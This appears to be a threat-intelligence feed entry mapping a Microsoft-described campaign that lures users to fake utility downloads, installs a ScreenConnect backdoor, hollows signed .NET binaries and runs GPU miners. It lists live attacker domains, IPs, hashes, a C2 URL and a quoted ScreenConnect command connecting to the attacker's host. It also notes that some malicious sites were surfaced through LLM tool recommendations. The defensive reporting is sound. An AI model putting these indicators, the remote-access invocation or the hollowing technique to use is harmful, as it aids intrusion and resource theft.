← feed

microsoft.2026.poisoned-search-screenconnect-gpu-miner

Poisoned search and AI-assisted fake utility downloads to ScreenConnect and GPU-miner C2

IIM chain for the Microsoft-described cryptojacking campaign published on 2026-05-26. The operation uses search-engine poisoning and observed AI-chatbot referral contexts to send users looking for trusted GPU/system utilities to attacker-controlled lookalike download sites. Those sites deliver ZIP archives from Dynu-backed gleeze/giize Dynamic DNS subdomains. The archive contains a legitimate utility executable and malicious autorun.dll variants. The DLL silently installs a ScreenConnect payload masquerading as vcredist_x64.dll, establishing persistent RMM access to directdownload.icu / 193.42.11.108. After the ScreenConnect session is established, the operator transfers SimpleRunPE.exe, which installs RuntimeHost.exe, hollows Microsoft-signed .NET utilities, and connects to the encrypted WebSocket C2 wss://minemine.gleeze.com:8443/ws with hardcoded TLS certificate pinning. The same certificate was observed on three additional IPs Microsoft assesses as part of the C2 infrastructure. The hollowed loader later downloads GPU-focused mining tools at runtime

confirmed IIM v1.1 unknown
Raw JSON
entities20
relations23
techniques5
published2026-05-27 17:02:04

Infrastructure map

Role-based chain map

click nodes or numbered relations to inspect the infrastructure path
entryredirectorstagingpayloadc2

Chain storyline

ordered IIM positions
1
entry

domain

attacker-controlled lookalike utility download domains (>150 domains; exact landing domains not published)

IIM-T011
2
staging

domain

direct-download.gleeze.com

IIM-T008IIM-T024
3
staging

domain

start-download.gleeze.com

IIM-T008IIM-T024
4
staging

domain

direct-downloads.giize.com

IIM-T008IIM-T024
5
staging

domain

free-download.giize.com

IIM-T008IIM-T024
6
staging

file

malicious ZIP archive containing legitimate utility executable plus autorun.dll

IIM-T024
7
payload

file

autorun.dll variant set loaded by legitimate utility executable

8
payload

hash

e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610

9
payload

file

ScreenConnect.ClientService.exe service invocation

10
c2

domain

directdownload.icu

11
c2

ip

193.42.11.108

12
payload

file

SimpleRunPE.exe variant set transferred through ScreenConnect file-transfer

13
payload

file

%LocalAppData%\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe

14
payload

file

Microsoft-signed .NET Framework hollowing target set

15
c2

url

wss://minemine.gleeze.com:8443/ws

IIM-T008IIM-T021
16
c2

certificate

EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67

IIM-T012
17
c2

ip

93.115.10.35

IIM-T012
18
c2

ip

198.23.185.238

IIM-T012
19
c2

ip

2.59.132.106

IIM-T012
20
payload

file

runtime-selected GPU miner archive / miner tool set: gminer, lolMiner, SRBMiner-MULTI

Relations

directed infrastructure edges
e001downloade002 confirmed
e001downloade003 confirmed
e001downloade004 likely
e001downloade005 likely
e002downloade006 confirmed
e003downloade006 confirmed
e004downloade006 likely
e005downloade006 likely
e006dropse007 confirmed
e007dropse008 confirmed
e008executee009 confirmed
e009connecte010 confirmed
e009connecte011 confirmed
e010resolves-toe011 likely
e011dropse012 confirmed
e012dropse013 confirmed
e013executee014 confirmed
e014connecte015 confirmed
e014referencese016 confirmed
e016referencese017 confirmed
e016referencese018 confirmed
e016referencese019 confirmed
e014downloade020 confirmed

Entities & evidence

observable inventory
IDTypeValueSource / evidence
e001 domain attacker-controlled lookalike utility download domains (>150 domains; exact landing domains not published)
Microsoft states the campaign begins when users search for common system utility and hardware-monitoring software and are directed to attacker-controlled lookalike sites through manipulated results.
The campaign impersonates CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear.
Microsoft states that since March 2026 it identified more than 150 malicious domains serving these masqueraded tools.
Microsoft also observed reports and VirusTotal metadata indicating that some malicious domains were surfaced through LLM-based tool recommendations; Microsoft describes this as observed/correlated, not a systemic issue with any specific AI service.
e002 domain direct-download.gleeze.com
Microsoft IOC table lists direct-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.
Microsoft states that each fake site retrieves a ZIP archive hosted on a campaign-specific subdomain of gleeze.com.
Microsoft states the gleeze.com parent domain is hosted by infrastructure associated with Dynu, a dynamic DNS provider.
e003 domain start-download.gleeze.com
Microsoft IOC table lists start-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.
Microsoft ties campaign ZIP retrieval to gleeze.com subdomains and identifies gleeze.com as Dynu-associated Dynamic DNS infrastructure.
e004 domain direct-downloads.giize.com
Microsoft IOC table lists direct-downloads[.]giize.com as a domain that hosts malicious ZIP files.
Microsoft states that additional linked campaigns used similar DynamicDNS domain giize[.]com and led to the same infection chain described in the blog.
e005 domain free-download.giize.com
Microsoft IOC table lists free-download[.]giize.com as a domain that hosts malicious ZIP files.
Microsoft states that giize[.]com sources were linked to similar SEO poisoning campaigns leading to the same infection chain.
e006 file malicious ZIP archive containing legitimate utility executable plus autorun.dll
Microsoft states each fake site presents a download button that retrieves a ZIP archive from a campaign-specific gleeze.com subdomain.
Microsoft states the downloaded ZIP archive contains the legitimate executable for the spoofed utility alongside a malicious DLL named autorun.dll.
Microsoft IOC table describes the gleeze/giize domains as hosts for malicious ZIP files.
e007 file autorun.dll variant set loaded by legitimate utility executable
Microsoft states the legitimate utility executable loads autorun.dll from the same folder via DLL sideloading.
Microsoft states analysis revealed nine distinct autorun.dll variants across the campaign.
Microsoft IOC table lists nine SHA-256 values for autorun.dll loaded by a legitimate executable via DLL sideloading.
SHA256 autorun.dll: 16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c
e008 hash e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610
Microsoft states autorun.dll uses msiexec.exe to silently install vcredist_x64.dll, which masquerades as the Visual C++ Redistributable.
Microsoft states vcredist_x64.dll is itself a packaged installer for ScreenConnect software.
Microsoft IOC table lists this SHA-256 as a ScreenConnect file masquerading as a DLL.
e009 file ScreenConnect.ClientService.exe service invocation
Microsoft states that once installed, the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.
Microsoft publishes the ScreenConnect service invocation containing h=directdownload.icu and p=8041.
Microsoft states the h parameter directdownload[.]icu is the host the client connects to.
e010 domain directdownload.icu
Microsoft states the ScreenConnect h parameter directdownload[.]icu is the host the client connects to.
Microsoft IOC table lists directdownload[.]icu as the domain host that the ScreenConnect client connects to.
e011 ip 193.42.11.108
Microsoft states the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.
Microsoft IOC table lists 193.42.11[.]108 as the IP address the ScreenConnect client communicates to.
e012 file SimpleRunPE.exe variant set transferred through ScreenConnect file-transfer
Microsoft states that once the ScreenConnect session is established, the attacker drops SimpleRunPE.exe directly via ScreenConnect file-transfer.
Microsoft IOC table lists two SHA-256 values for SimpleRunPE.exe transferred by the attacker during the established ScreenConnect session.
Microsoft reports a PDB path matching a Simple-RunPE-Process-Hollowing RUNPE-style codebase, but assesses the fork lineage only with moderate confidence.
SHA256 SimpleRunPE.exe: 9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386
e013 file %LocalAppData%\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe
Microsoft states SimpleRunPE.exe writes a copy of itself into a hidden install folder as RuntimeHost.exe.
Microsoft states the fallback install path is %LocalAppData%\Microsoft\Windows\Caches\D3F4E2A1\.
Microsoft hunting content searches for RuntimeHost.exe executions from paths containing \Caches\D3F4E2A1.
e014 file Microsoft-signed .NET Framework hollowing target set
Microsoft states SimpleRunPE.exe attempts process hollowing into a legitimate Microsoft-signed binary.
Microsoft lists seven candidate .NET Framework utilities: InstallUtil.exe, RegAsm.exe, RegSvcs.exe, MSBuild.exe, AppLaunch.exe, AddInProcess.exe, and aspnet_compiler.exe.
Microsoft states the dropper launches the chosen target suspended and uses WriteProcessMemory, SetThreadContext, and ResumeThread so malicious mining code runs under a trusted Microsoft-signed binary.
e015 url wss://minemine.gleeze.com:8443/ws
Microsoft states the attacker server address is stored in an AES-128-CBC encrypted blob.
Microsoft states decrypting the embedded blob yields the C2 URL wss[:]//minemine.gleeze[.]com:8443/ws.
Microsoft IOC table lists wss[:]//minemine.gleeze[.]com:8443/ws as the C2 URL from the hollowed binary.
e016 certificate EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67
Microsoft states the malware hardcodes the SHA-256 fingerprint of the TLS certificate expected at the endpoint for certificate pinning during the WebSocket handshake.
Microsoft states OSINT observed this TLS certificate being presented by three IP addresses and Microsoft assesses those IPs as part of C2 infrastructure.
e017 ip 93.115.10.35
Microsoft states OSINT observed the hard-coded TLS certificate being presented by 93.115[.]10.35.
Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure.
e018 ip 198.23.185.238
Microsoft states OSINT observed the hard-coded TLS certificate being presented by 198.23[.]185.238.
Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure.
e019 ip 2.59.132.106
Microsoft states OSINT observed the hard-coded TLS certificate being presented by 2.59.132[.]106.
Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure.
e020 file runtime-selected GPU miner archive / miner tool set: gminer, lolMiner, SRBMiner-MULTI
Microsoft states the hollowed Windows binary does not embed a miner program.
Microsoft states that when it is time to begin mining, the malware downloads the appropriate miner archive at runtime and runs it.
Microsoft states three GPU-focused miner programs are supported: gminer, lolMiner, and SRBMiner-MULTI.
Microsoft did not publish the runtime miner archive URL in the article.

ATT&CK annotations

optional complementary mapping
T1189Drive-by Compromise

Users searching for utilities are directed to attacker-controlled lookalike download sites through poisoned search results.

T1105Ingress Tool Transfer

ZIP payloads, SimpleRunPE.exe, and runtime miner archives are transferred into the environment.

T1574.002Hijack Execution Flow: DLL Side-Loading

Legitimate utility executable loads autorun.dll from the same folder.

T1219Remote Access Software

ScreenConnect is abused to establish persistent remote access.

T1055.012Process Injection: Process Hollowing

SimpleRunPE/RuntimeHost hollow Microsoft-signed .NET utilities.

T1496Resource Hijacking

The campaign downloads and runs GPU-focused mining tools.

Raw IIM JSON canonical body from MANTIS expand
{
  "iim_version": "1.1",
  "chain_id": "microsoft.2026.poisoned-search-screenconnect-gpu-miner",
  "title": "Poisoned search and AI-assisted fake utility downloads to ScreenConnect and GPU-miner C2",
  "description": "IIM chain for the Microsoft-described cryptojacking campaign published on 2026-05-26. The operation uses search-engine poisoning and observed AI-chatbot referral contexts to send users looking for trusted GPU/system utilities to attacker-controlled lookalike download sites. Those sites deliver ZIP archives from Dynu-backed gleeze/giize Dynamic DNS subdomains. The archive contains a legitimate utility executable and malicious autorun.dll variants. The DLL silently installs a ScreenConnect payload masquerading as vcredist_x64.dll, establishing persistent RMM access to directdownload.icu / 193.42.11.108. After the ScreenConnect session is established, the operator transfers SimpleRunPE.exe, which installs RuntimeHost.exe, hollows Microsoft-signed .NET utilities, and connects to the encrypted WebSocket C2 wss://minemine.gleeze.com:8443/ws with hardcoded TLS certificate pinning. The same certificate was observed on three additional IPs Microsoft assesses as part of the C2 infrastructure. The hollowed loader later downloads GPU-focused mining tools at runtime.",
  "actor_id": "unknown",
  "observed_at": "2026-05-26T00:00:00Z",
  "confidence": "confirmed",
  "needs_review": false,
  "import_source": "manual-osint-report-to-iim-conversion",
  "entities": [
    {
      "id": "e001",
      "type": "domain",
      "value": "attacker-controlled lookalike utility download domains (>150 domains; exact landing domains not published)",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the campaign begins when users search for common system utility and hardware-monitoring software and are directed to attacker-controlled lookalike sites through manipulated results.",
        "The campaign impersonates CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear.",
        "Microsoft states that since March 2026 it identified more than 150 malicious domains serving these masqueraded tools.",
        "Microsoft also observed reports and VirusTotal metadata indicating that some malicious domains were surfaced through LLM-based tool recommendations; Microsoft describes this as observed/correlated, not a systemic issue with any specific AI service."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_exact_iocs_published": false,
      "x_modeling_note": "This entity models the report-confirmed landing-domain set. The exact landing domains were not published by Microsoft."
    },
    {
      "id": "e002",
      "type": "domain",
      "value": "direct-download.gleeze.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists direct-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.",
        "Microsoft states that each fake site retrieves a ZIP archive hosted on a campaign-specific subdomain of gleeze.com.",
        "Microsoft states the gleeze.com parent domain is hosted by infrastructure associated with Dynu, a dynamic DNS provider."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "direct-download[.]gleeze[.]com"
    },
    {
      "id": "e003",
      "type": "domain",
      "value": "start-download.gleeze.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists start-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.",
        "Microsoft ties campaign ZIP retrieval to gleeze.com subdomains and identifies gleeze.com as Dynu-associated Dynamic DNS infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "start-download[.]gleeze[.]com"
    },
    {
      "id": "e004",
      "type": "domain",
      "value": "direct-downloads.giize.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists direct-downloads[.]giize.com as a domain that hosts malicious ZIP files.",
        "Microsoft states that additional linked campaigns used similar DynamicDNS domain giize[.]com and led to the same infection chain described in the blog."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "direct-downloads[.]giize.com",
      "x_scope": "linked sibling staging infrastructure leading to the same infection chain"
    },
    {
      "id": "e005",
      "type": "domain",
      "value": "free-download.giize.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists free-download[.]giize.com as a domain that hosts malicious ZIP files.",
        "Microsoft states that giize[.]com sources were linked to similar SEO poisoning campaigns leading to the same infection chain."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "free-download[.]giize.com",
      "x_scope": "linked sibling staging infrastructure leading to the same infection chain"
    },
    {
      "id": "e006",
      "type": "file",
      "value": "malicious ZIP archive containing legitimate utility executable plus autorun.dll",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states each fake site presents a download button that retrieves a ZIP archive from a campaign-specific gleeze.com subdomain.",
        "Microsoft states the downloaded ZIP archive contains the legitimate executable for the spoofed utility alongside a malicious DLL named autorun.dll.",
        "Microsoft IOC table describes the gleeze/giize domains as hosts for malicious ZIP files."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/"
    },
    {
      "id": "e007",
      "type": "file",
      "value": "autorun.dll variant set loaded by legitimate utility executable",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the legitimate utility executable loads autorun.dll from the same folder via DLL sideloading.",
        "Microsoft states analysis revealed nine distinct autorun.dll variants across the campaign.",
        "Microsoft IOC table lists nine SHA-256 values for autorun.dll loaded by a legitimate executable via DLL sideloading.",
        "SHA256 autorun.dll: 16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
        "SHA256 autorun.dll: 1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
        "SHA256 autorun.dll: 062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
        "SHA256 autorun.dll: c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
        "SHA256 autorun.dll: a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
        "SHA256 autorun.dll: db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
        "SHA256 autorun.dll: cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
        "SHA256 autorun.dll: 69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
        "SHA256 autorun.dll: 2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7"
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_hashes_sha256": [
        "16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
        "1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
        "062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
        "c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
        "a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
        "db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
        "cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
        "69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
        "2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7"
      ]
    },
    {
      "id": "e008",
      "type": "hash",
      "value": "e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states autorun.dll uses msiexec.exe to silently install vcredist_x64.dll, which masquerades as the Visual C++ Redistributable.",
        "Microsoft states vcredist_x64.dll is itself a packaged installer for ScreenConnect software.",
        "Microsoft IOC table lists this SHA-256 as a ScreenConnect file masquerading as a DLL."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_filename": "vcredist_x64.dll",
      "x_description": "ScreenConnect file masquerading as a DLL"
    },
    {
      "id": "e009",
      "type": "file",
      "value": "ScreenConnect.ClientService.exe service invocation",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states that once installed, the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.",
        "Microsoft publishes the ScreenConnect service invocation containing h=directdownload.icu and p=8041.",
        "Microsoft states the h parameter directdownload[.]icu is the host the client connects to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_command_excerpt": "ScreenConnect.ClientService.exe ?e=Access&y=Guest&h=directdownload.icu&p=8041&s=b31c5795-9b66-4d20-ac8d-aad60d05852a&k=..."
    },
    {
      "id": "e010",
      "type": "domain",
      "value": "directdownload.icu",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the ScreenConnect h parameter directdownload[.]icu is the host the client connects to.",
        "Microsoft IOC table lists directdownload[.]icu as the domain host that the ScreenConnect client connects to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "directdownload[.]icu"
    },
    {
      "id": "e011",
      "type": "ip",
      "value": "193.42.11.108",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.",
        "Microsoft IOC table lists 193.42.11[.]108 as the IP address the ScreenConnect client communicates to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "193.42.11[.]108"
    },
    {
      "id": "e012",
      "type": "file",
      "value": "SimpleRunPE.exe variant set transferred through ScreenConnect file-transfer",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states that once the ScreenConnect session is established, the attacker drops SimpleRunPE.exe directly via ScreenConnect file-transfer.",
        "Microsoft IOC table lists two SHA-256 values for SimpleRunPE.exe transferred by the attacker during the established ScreenConnect session.",
        "Microsoft reports a PDB path matching a Simple-RunPE-Process-Hollowing RUNPE-style codebase, but assesses the fork lineage only with moderate confidence.",
        "SHA256 SimpleRunPE.exe: 9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
        "SHA256 SimpleRunPE.exe: 7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496"
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_hashes_sha256": [
        "9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
        "7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496"
      ],
      "x_pdb_path": "G:\\My Drive\\works\\test projects\\Simple-RunPE-Process-Hollowing-RUNPE\\SimpleRunPE\\obj\\Release\\SimpleRunPE.pdb",
      "x_lineage_confidence": "moderate"
    },
    {
      "id": "e013",
      "type": "file",
      "value": "%LocalAppData%\\Microsoft\\Windows\\Caches\\D3F4E2A1\\RuntimeHost.exe",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states SimpleRunPE.exe writes a copy of itself into a hidden install folder as RuntimeHost.exe.",
        "Microsoft states the fallback install path is %LocalAppData%\\Microsoft\\Windows\\Caches\\D3F4E2A1\\.",
        "Microsoft hunting content searches for RuntimeHost.exe executions from paths containing \\Caches\\D3F4E2A1."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_mutex": "Global\\D3F4E2A1_Svc"
    },
    {
      "id": "e014",
      "type": "file",
      "value": "Microsoft-signed .NET Framework hollowing target set",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states SimpleRunPE.exe attempts process hollowing into a legitimate Microsoft-signed binary.",
        "Microsoft lists seven candidate .NET Framework utilities: InstallUtil.exe, RegAsm.exe, RegSvcs.exe, MSBuild.exe, AppLaunch.exe, AddInProcess.exe, and aspnet_compiler.exe.",
        "Microsoft states the dropper launches the chosen target suspended and uses WriteProcessMemory, SetThreadContext, and ResumeThread so malicious mining code runs under a trusted Microsoft-signed binary."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_targets": [
        "InstallUtil.exe",
        "RegAsm.exe",
        "RegSvcs.exe",
        "MSBuild.exe",
        "AppLaunch.exe",
        "AddInProcess.exe",
        "aspnet_compiler.exe"
      ]
    },
    {
      "id": "e015",
      "type": "url",
      "value": "wss://minemine.gleeze.com:8443/ws",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the attacker server address is stored in an AES-128-CBC encrypted blob.",
        "Microsoft states decrypting the embedded blob yields the C2 URL wss[:]//minemine.gleeze[.]com:8443/ws.",
        "Microsoft IOC table lists wss[:]//minemine.gleeze[.]com:8443/ws as the C2 URL from the hollowed binary."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "wss[:]//minemine.gleeze[.]com:8443/ws"
    },
    {
      "id": "e016",
      "type": "certificate",
      "value": "EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the malware hardcodes the SHA-256 fingerprint of the TLS certificate expected at the endpoint for certificate pinning during the WebSocket handshake.",
        "Microsoft states OSINT observed this TLS certificate being presented by three IP addresses and Microsoft assesses those IPs as part of C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_usage": "TLS certificate pinning for WebSocket C2"
    },
    {
      "id": "e017",
      "type": "ip",
      "value": "93.115.10.35",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 93.115[.]10.35.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "93.115[.]10.35"
    },
    {
      "id": "e018",
      "type": "ip",
      "value": "198.23.185.238",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 198.23[.]185.238.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "198.23[.]185.238"
    },
    {
      "id": "e019",
      "type": "ip",
      "value": "2.59.132.106",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 2.59.132[.]106.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "2.59.132[.]106"
    },
    {
      "id": "e020",
      "type": "file",
      "value": "runtime-selected GPU miner archive / miner tool set: gminer, lolMiner, SRBMiner-MULTI",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the hollowed Windows binary does not embed a miner program.",
        "Microsoft states that when it is time to begin mining, the malware downloads the appropriate miner archive at runtime and runs it.",
        "Microsoft states three GPU-focused miner programs are supported: gminer, lolMiner, and SRBMiner-MULTI.",
        "Microsoft did not publish the runtime miner archive URL in the article."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_exact_download_url_published": false
    }
  ],
  "chain": [
    {
      "entity_id": "e001",
      "role": "entry",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "likely",
      "review_notes": "Exact landing domains were not published, but Microsoft confirms more than 150 malicious masquerading domains and a broad portfolio of fake utility brands."
    },
    {
      "entity_id": "e002",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e003",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e004",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "likely",
      "technique_confidence": "confirmed",
